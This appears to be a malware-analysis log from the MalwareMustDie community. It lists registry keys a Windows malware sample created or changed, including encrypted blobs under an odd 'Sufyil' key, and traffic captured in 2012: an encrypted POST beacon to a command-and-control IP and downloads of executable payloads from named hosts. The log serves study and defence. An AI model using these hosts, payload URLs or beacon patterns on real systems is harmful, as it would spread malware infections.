- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server ID: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\Account Name: "Bigfoot インターネット ディレクトリ サービス"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server: "ldap.bigfoot.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP URL: "http://www.bigfoot.com"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Search Return: 0x00000064
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Timeout: 0x0000003C
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Authentication: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Simple Search: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server ID: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\Account Name: "Active Directory"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server: "NULL"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Return: 0x00000064
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Timeout: 0x0000003C
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Authentication: 0x00000002
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Simple Search: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Bind DN: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Port: 0x00000CC4
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Resolve Flag: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Secure Connection: 0x00000000
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP User Name: "NULL"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Base: "NULL"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVer: 0x00000004
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\PreConfigVerNTDS: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Server ID: 0x00000004
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Default LDAP Account: "Active Directory GC"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\16c6jhji: 10 38 3A 8C EC 37 4D 37 6B 85 7C 00 79 57
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1b52cjj4: 0x8C5B382D
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\2b4gb2j8: 61 31 68 62 6A 44 34 4F 4B 54 63 65 68 55 30 41
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\12jcjhb
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\7ec4g79: (large binary blob omitted)
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil\1ccc3cfg: 9A A2 3F 43 D5 D4 29 01 0A 77 93 11 1E BD CB F6 47 7D 44 34 F9 57 05 D6 50 A6 04 20 31 A0 C6 83 8F 80 3D 1A 68 60 03 5F 84 3D AC 6C B2 88 18 88 99 2B A0 5D 56 FA DE D5 60 D6 91 F1 63 99 15 7F 5C F2 20 71 D5 02 D6 6E AC 91 73 DC 53 DB 47 F4 B3 CF 90 56 06 13 98 0B 1E BC DF CA 0F B7 06 3A 13 57 8F 81 02 CF D2 65 9B 8D 0E 73 99 06 7A E8 56 FE 55 72 6A F0 3A 4F 71 88 7C AB 6C E6 FF 91 4B 67 52 B1 56 6D AF 13 17 A5 54 4C F6 AB 35 D5 35 F3 91 78 F4 BC 49 8D 2D C0 11 7A 6D D0 DE DF E7 BF 97 6C D7 49 D9 C6 A8 BB BD 34 89 67 09 9E CD 25 1E 58 3F 6B 5B AD 80 F5 01 37 E4 A5 43 59 5A 2A 24 4F 0D BC 9B 5B 82 2F 55 DD AF 89 B1 B4 08 46 53 D3 F7 61 FC 46 9D D0 94 81 C7 EA 48 22 D9 C2 B8 B1 E6 97 E3 89 24 D0 5E CB F6 8F 43 C1 31 24 6D A0 90 59 DF FB 70 F3 A1 5C 78 73 B9 00 93 5B A0 87 1F 34 3F 13 A6 71 8A DF 32 3A D5 D0 28 92 83 34 2D FE B6 FD AD 62 81 C6 E6 DE B8 FE A6 ED BC 9C AB AA 27 57 90 60 14 A9 5E 56 32 82 43 2B 15 7A 80 3F 25 C8 DF 42 83 EF 35 03 7D 93 FA DC CD B7 A7 AF 0E A3 F3 1B 40 DA 3F 3F 73 F3 92 F6 F4 0C 13 94 47 BB 82 08 D7 D2 BD 81 4F 09 AF 1E 67 61 3A 06 1E B8 C0 22 8E 4B 07 08 C3 D0 99 A3 9A A0 15 BE 12 49 BC 8A 2A DB 37 A2 DA BE 17 34 9D 14 70 CD 91 22 3D 72 4B 04 3C B6 FC 5D D3 B0 D0 CD 52 A8 1C F6 EC E0 F3 E5 3C D2 08 06 BA 67 D3 0F 76 6A BB DF 55 77 AC 0C A5 B1 12 7E AC EA C1 4F 91 A4 D8 D8 33 6C EE C6 6D 8B 42 25 F2 8C 81 29 44 B5 8E D8 C5 53 E1 09 74 77 06 E8 91 25 34 B5 43 ED A3 2D 76 1E 02 A8 39 F3 1F 8C AB F2 B3 EA B1 6F 6B 21 83 DC 58 9E F5 75 D2 2B 91 DA 48 5C 36 B6 B0 43 6A 4B A7 5B EA E5 D3 2D 54 AF 2F 45 48 44 C7 34 0D FE FA 51 F3 46 F6 A4 AF 0D 1B 11 2C C7 CD EB 8D EC 27 2F 58 60 8E CA DD 7A 97 DF A3 E0 3A 71 EC DC F1 93 87 CC 2B 42 4B 37 37 D6 9E 08 A1 2B 8B E5 56 67 93 69 2B 20 6C 4A 81 8E 04 04 CC 9B BF C7 ED DF 8B 33 A9 0C 8E 21 75 A1 67 FE D0 5C 1C 96 D5 A4 A9 DF D2 DC 0B C5 AF 08 37 96 6C 89 DF 72 AB 7E EC 51 10 9D 21 4B 0D 4D 16 C5 21 0A B0 00 2F 23 3D 
49 76 47 3B 62 22 47 B9 68 46 5C 8F 1E 8F 94 BB D5 73 31 F8 B7 70 94 56 BC 15 38 B0 45 3A BE 48 10 F5 11 DF 4C 9A ED 39 F0 56 31 47 88 91 6C CA 10 D7 6B DF 8D F6 3D 7C 26 B2 27 67 DB 3D 97 4F D1 68 CC EF A0 C7 4D B0 A1 67 3D 22 72 BD 3B 22 FB 13 E2 F5 F9 01 73 23 1E 03 17 1B 42 A5 6F C2 C4 12 14 C6 7C FF C8 76 FC E3 A8 C0 F0 AA AB 69 39 8D 3B 93 6B 1F 03 83 46 68 5B 05 5F C4 8B FF 81 A3 BF C3 96 A2 3E 6D 98 69 B4 04 FC 2D 72 88 F3 49 8D D0 06 71 95 95 46 55 8D 97 FA 80 C3 10 56 2D 54 0F
- ----------------------------------
- Values modified:23
- ----------------------------------
- HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 90 30 12 62 DD 7F 82 8B 16 05 C8 00 DB B4 6A A5 46 4D 70 E1 BF D3 DF C0 7F 53 19 88 0A 81 8E 16 41 0C 73 6B 8C 8D 74 B2 A2 94 6D 55 8D DC 9D 40 85 6C B0 1F B7 5F A2 35 77 97 7A D6 D7 26 EE 09 C9 06 26 2A 26 AA B5 59 51 09 CF 32 62 5B 0F 61
- HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 20 96 FE 0B A2 D7 98 9E C7 C0 44 9D 8F 5B 02 79 62 CE 07 0C 38 C7 E1 A7 C3 61 66 55 B8 D2 89 FB 8C AA 14 30 8F C4 BA 33 00 08 05 78 1F 55 8D 14 8F 02 4F 97 D4 75 FF AA CA 99 B1 97 E8 8C 9B 21 79 3E D3 02 C1 54 C3 8C FE 6C 35 6F C0 C8 03 C6
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000015
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x0000002B
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000008
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000C
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
- HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x00000027
- HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Epoch\Epoch: 0x0000002A
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
- HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x00000027
- HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch\Epoch: 0x0000002A
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000001
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\Identity Ordinal: 0x00000002
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File1: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\MRUList: "ab"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\MRUList: "cba"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "a"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\MRUList: "ba"
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 15 00 00 00 30 58 95 5D 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 01 00 00 00 19 00 00 00 D0 F5 A2 C6 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 2F 00 00 00 20 13 9A 5D 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 01 00 00 00 35 00 00 00 60 65 CB C6 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 06 00 00 00 B0 96 90 4F 1C AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:ペイント.yax: 01 00 00 00 07 00 00 00 D0 F5 A2 C6 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 06 00 00 00 40 E8 BD 4F 1C AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\zfcnvag.rkr: 01 00 00 00 07 00 00 00 60 65 CB C6 1D AC CD 01
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 05 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 90 F5 57 C9 7B A4 CD 01 01 00 00 00 C0 A8 07 54 00 00 00 00 00 00 00 00
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 02 00 00 00 01 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 01 00 00 00 02 00 00 00 00 00 00 00 FF FF FF FF
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000004
- HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000006
- ==============================================
- EVIL NETWORK CONNECTIVITIES..............
- ==============================================
- (1)POST /forum/viewtopic.php HTTP/1.0
- Host: 108.178.59.34
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Content-Length: 255
- Connection: close
- Content-Type: application/octet-stream
- Content-Encoding: binary
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- CRYPTED0.....?E..+..?X.Q...M.....i....fx....F.hp.q.....2.=B
- ..*..8..EA`....sj[.....O...2.#Ic.4H..BE...s..$.i.,X.....o.U
- ..5....GCP..7=.Jt.vpq5o.+.....)u(....?.$....`...O...u.n....
- ...V.....+Y.u .{..}X?V.h..x.....*.5.Gy.(...>)..1....@.B.B..;
- =C.f..<.\......B.*HTTP/1.1 200 OK
- Server: nginx/0.7.67
- Date: Wed, 17 Oct 2012 04:17:15 GMT
- Content-Type: text/html
- Connection: close
- X-Powered-By: PHP/5.3.14-1~dotdeb.0
- -----------
- (2)GET /Z2U.exe HTTP/1.0
- Host: 3073.a.hostable.me
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- HTTP/1.1 200 OK
- Date: Wed, 17 Oct 2012 04:13:17 GMT
- Server: Apache
- Last-Modified: Wed, 17 Oct 2012 04:10:03 GMT
- Accept-Ranges: bytes
- Content-Length: 407128
- Connection: close
- Content-Type: application/x-msdownload
- MZ......................@..........................................
- .....!..L.!This program cannot be run in DOS mode.
- $.......PE..L...
- ----------------------------------------
- (3)GET /PNV3Hbi.exe HTTP/1.0
- Host: 85.18.21.252
- Accept: */*
- Accept-Encoding: identity, *;q=0
- Connection: close
- User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- HTTP/1.1 200 OK
- Date: Wed, 17 Oct 2012 04:09:24 GMT
- Server: Apache/2.2.22 (Debian)
- Last-Modified: Wed, 17 Oct 2012 04:06:07 GMT
- ETag: "242fca-63658-4cc3963d6a094"
- Accept-Ranges: bytes
- Content-Length: 407128
- Connection: close
- Content-Type: application/x-msdos-program
- MZ......................@...............................................!
- This program cannot be run in DOS mode.$.......PE..L....(~P..............
- .Z....................@.......................... ......................
- ......................................................................U..
- ..E..M.....E..U..E..M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E.
- .E......E...]....U...E.P.M.Q.U.R.|......]........U..Q.E.."...E.."...E..".
- #MalwareMustDie!!!!!!!!!